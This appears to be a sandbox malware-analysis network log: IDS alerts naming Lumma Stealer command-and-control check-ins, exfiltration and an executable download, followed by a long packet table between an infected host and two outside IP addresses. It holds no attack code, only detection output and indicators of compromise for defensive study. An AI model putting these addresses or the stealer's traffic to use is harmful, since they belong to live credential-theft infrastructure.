Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-26T14:14:25.449248+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49704	104.21.11.101	443	TCP
2024-12-26T14:14:26.464403+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.8	49704	104.21.11.101	443	TCP
2024-12-26T14:14:26.464403+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.8	49704	104.21.11.101	443	TCP
2024-12-26T14:14:27.781903+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49705	104.21.11.101	443	TCP
2024-12-26T14:14:28.707281+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.8	49705	104.21.11.101	443	TCP
2024-12-26T14:14:28.707281+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.8	49705	104.21.11.101	443	TCP
2024-12-26T14:14:30.418418+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49706	104.21.11.101	443	TCP
2024-12-26T14:14:31.430780+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.8	49706	104.21.11.101	443	TCP
2024-12-26T14:14:33.112794+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49707	104.21.11.101	443	TCP
2024-12-26T14:14:35.897979+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49708	104.21.11.101	443	TCP
2024-12-26T14:14:38.986509+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49709	104.21.11.101	443	TCP
2024-12-26T14:14:42.159644+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49713	104.21.11.101	443	TCP
2024-12-26T14:14:47.861020+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49714	104.21.11.101	443	TCP
2024-12-26T14:14:48.620218+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.8	49714	104.21.11.101	443	TCP
2024-12-26T14:14:50.201932+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.8	49715	185.215.113.16	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 26, 2024 14:14:17.541322947 CET	49672	443	192.168.2.8	23.206.229.226
Dec 26, 2024 14:14:23.338243008 CET	49676	443	192.168.2.8	52.182.143.211
Dec 26, 2024 14:14:24.129371881 CET	49704	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:24.129399061 CET	443	49704	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:24.129457951 CET	49704	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:24.133352995 CET	49704	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:24.133363008 CET	443	49704	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:25.449174881 CET	443	49704	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:25.449248075 CET	49704	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:25.452915907 CET	49704	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:25.452924013 CET	443	49704	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:25.453315973 CET	443	49704	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:25.494431973 CET	49704	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:25.500906944 CET	49704	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:25.500940084 CET	49704	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:25.501003981 CET	443	49704	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:26.103810072 CET	49677	80	192.168.2.8	192.229.211.108
Dec 26, 2024 14:14:26.464404106 CET	443	49704	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:26.464524984 CET	443	49704	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:26.464593887 CET	49704	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:26.466989994 CET	49704	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:26.467005968 CET	443	49704	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:26.475119114 CET	49705	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:26.475167036 CET	443	49705	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:26.475255013 CET	49705	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:26.475534916 CET	49705	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:26.475550890 CET	443	49705	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:26.744563103 CET	49673	443	192.168.2.8	23.206.229.226
Dec 26, 2024 14:14:27.150680065 CET	49672	443	192.168.2.8	23.206.229.226
Dec 26, 2024 14:14:27.781795025 CET	443	49705	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:27.781903028 CET	49705	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:27.919939041 CET	49705	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:27.919972897 CET	443	49705	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:27.920356989 CET	443	49705	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:27.923408985 CET	49705	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:27.923432112 CET	49705	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:27.923516035 CET	443	49705	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:28.707285881 CET	443	49705	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:28.707334042 CET	443	49705	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:28.707355022 CET	443	49705	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:28.707402945 CET	443	49705	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:28.707421064 CET	49705	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:28.707431078 CET	443	49705	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:28.707453966 CET	443	49705	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:28.707469940 CET	49705	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:28.707501888 CET	49705	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:28.707506895 CET	443	49705	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:28.723292112 CET	443	49705	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:28.723323107 CET	443	49705	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:28.723359108 CET	49705	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:28.723377943 CET	443	49705	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:28.723423958 CET	49705	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:28.731640100 CET	443	49705	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:28.775594950 CET	49705	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:28.827097893 CET	443	49705	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:28.869460106 CET	49705	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:28.917597055 CET	443	49705	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:28.921313047 CET	443	49705	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:28.921335936 CET	443	49705	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:28.921372890 CET	49705	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:28.921403885 CET	443	49705	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:28.921416044 CET	443	49705	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:28.921442032 CET	49705	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:28.921469927 CET	49705	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:28.921632051 CET	49705	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:28.921649933 CET	443	49705	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:28.921658993 CET	49705	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:28.921664000 CET	443	49705	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:29.111742020 CET	49706	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:29.111793041 CET	443	49706	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:29.111864090 CET	49706	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:29.112386942 CET	49706	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:29.112404108 CET	443	49706	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:29.546230078 CET	443	49703	23.206.229.226	192.168.2.8
Dec 26, 2024 14:14:29.546339035 CET	49703	443	192.168.2.8	23.206.229.226
Dec 26, 2024 14:14:30.418276072 CET	443	49706	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:30.418417931 CET	49706	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:30.424088001 CET	49706	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:30.424132109 CET	443	49706	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:30.424386978 CET	443	49706	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:30.425503016 CET	49706	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:30.425638914 CET	49706	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:30.425671101 CET	443	49706	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:31.430767059 CET	443	49706	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:31.430881023 CET	443	49706	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:31.430973053 CET	49706	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:31.431224108 CET	49706	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:31.431245089 CET	443	49706	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:31.632005930 CET	49707	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:31.632055998 CET	443	49707	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:31.632107973 CET	49707	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:31.632432938 CET	49707	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:31.632451057 CET	443	49707	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:33.112642050 CET	443	49707	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:33.112793922 CET	49707	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:33.114321947 CET	49707	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:33.114337921 CET	443	49707	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:33.114590883 CET	443	49707	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:33.115964890 CET	49707	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:33.116138935 CET	49707	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:33.116177082 CET	443	49707	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:33.116234064 CET	49707	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:33.163341999 CET	443	49707	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:34.151451111 CET	443	49707	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:34.151546001 CET	443	49707	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:34.151599884 CET	49707	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:34.290169001 CET	49707	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:34.290182114 CET	443	49707	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:34.592250109 CET	49708	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:34.592302084 CET	443	49708	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:34.592363119 CET	49708	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:34.592744112 CET	49708	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:34.592756033 CET	443	49708	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:35.897852898 CET	443	49708	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:35.897979021 CET	49708	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:35.899473906 CET	49708	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:35.899488926 CET	443	49708	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:35.899772882 CET	443	49708	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:35.901273012 CET	49708	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:35.901451111 CET	49708	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:35.901490927 CET	443	49708	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:35.901555061 CET	49708	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:35.901565075 CET	443	49708	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:36.849653006 CET	443	49708	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:36.849746943 CET	443	49708	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:36.849817038 CET	49708	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:36.861990929 CET	49708	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:36.862015963 CET	443	49708	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:37.681108952 CET	49709	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:37.681158066 CET	443	49709	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:37.681229115 CET	49709	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:37.681557894 CET	49709	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:37.681570053 CET	443	49709	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:38.986442089 CET	443	49709	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:38.986509085 CET	49709	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:38.987756968 CET	49709	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:38.987766027 CET	443	49709	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:38.987992048 CET	443	49709	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:38.989228010 CET	49709	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:38.989310980 CET	49709	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:38.989315987 CET	443	49709	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:39.817372084 CET	443	49709	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:39.817476988 CET	443	49709	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:39.817593098 CET	49709	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:40.021657944 CET	49709	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:40.021703005 CET	443	49709	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:40.852665901 CET	49713	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:40.852727890 CET	443	49713	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:40.852948904 CET	49713	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:40.853329897 CET	49713	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:40.853343010 CET	443	49713	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:42.159559011 CET	443	49713	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:42.159643888 CET	49713	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:42.161209106 CET	49713	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:42.161221027 CET	443	49713	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:42.161446095 CET	443	49713	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:42.168802977 CET	49713	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:42.169487953 CET	49713	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:42.169519901 CET	443	49713	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:42.169796944 CET	49713	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:42.169828892 CET	443	49713	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:42.169924021 CET	49713	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:42.169965982 CET	443	49713	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:42.170073986 CET	49713	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:42.170109034 CET	443	49713	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:42.170267105 CET	49713	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:42.170300007 CET	443	49713	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:42.170470953 CET	49713	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:42.170501947 CET	443	49713	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:42.170516968 CET	49713	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:42.170527935 CET	443	49713	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:42.170644999 CET	49713	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:42.170672894 CET	443	49713	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:42.170691013 CET	49713	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:42.170823097 CET	49713	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:42.170854092 CET	49713	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:42.215334892 CET	443	49713	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:42.215590000 CET	49713	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:42.215637922 CET	443	49713	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:42.215658903 CET	49713	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:42.215679884 CET	443	49713	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:42.215715885 CET	49713	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:42.215743065 CET	443	49713	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:46.501568079 CET	443	49713	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:46.501646042 CET	443	49713	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:46.501712084 CET	49713	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:46.502022028 CET	49713	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:46.502032042 CET	443	49713	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:46.555548906 CET	49714	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:46.555589914 CET	443	49714	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:46.555659056 CET	49714	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:46.556134939 CET	49714	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:46.556159973 CET	443	49714	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:47.860892057 CET	443	49714	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:47.861020088 CET	49714	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:47.863683939 CET	49714	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:47.863713026 CET	443	49714	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:47.863950968 CET	443	49714	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:47.865267038 CET	49714	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:47.865304947 CET	49714	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:47.865350962 CET	443	49714	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:48.620225906 CET	443	49714	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:48.620326996 CET	443	49714	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:48.620383024 CET	49714	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:48.646401882 CET	49714	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:48.646440983 CET	443	49714	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:48.646454096 CET	49714	443	192.168.2.8	104.21.11.101
Dec 26, 2024 14:14:48.646461010 CET	443	49714	104.21.11.101	192.168.2.8
Dec 26, 2024 14:14:48.648751974 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:48.768460035 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:48.768590927 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:48.768763065 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:48.888210058 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.201829910 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.201875925 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.201889038 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.201910973 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.201925039 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.201931953 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:50.201936960 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.201948881 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.201955080 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:50.202001095 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:50.202153921 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.202166080 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.202176094 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.202193975 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:50.202219963 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:50.321829081 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.321851969 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.321932077 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:50.412235022 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.412261963 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.412323952 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:50.416380882 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.416469097 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.416510105 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:50.424849033 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.427778006 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.427824974 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:50.427911043 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.436186075 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.436238050 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:50.436264038 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.444528103 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.444595098 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:50.444622993 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.452944040 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.453000069 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:50.453031063 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.461287022 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.461337090 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:50.461419106 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.469703913 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.469763994 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:50.469805956 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.478059053 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.478132010 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:50.478245974 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.486488104 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.486543894 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:50.486569881 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.494842052 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.494965076 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:50.531929016 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.572649002 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:50.622771978 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.622879028 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.622970104 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:50.625344992 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.625428915 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.625492096 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:50.630927086 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.631061077 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.631110907 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:50.636415958 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.636533022 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.636581898 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:50.641940117 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.642031908 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.642076015 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:50.647583961 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.647684097 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.647743940 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:50.652988911 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.653094053 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.653141022 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:50.658550978 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.658684015 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.658731937 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:50.664036036 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.664134979 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.664180994 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:50.669542074 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.669631004 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.669678926 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:50.675184011 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.675440073 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.675477028 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:50.680632114 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.680710077 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.680752993 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:50.686173916 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.686311960 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.686366081 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:50.691797972 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.691865921 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.691911936 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:50.697164059 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.697398901 CET	80	49715	185.215.113.16	192.168.2.8
Dec 26, 2024 14:14:50.697459936 CET	49715	80	192.168.2.8	185.215.113.16
Dec 26, 2024 14:14:50.702666998 CET	80	49715	185.215.113.16	192.168.2.8
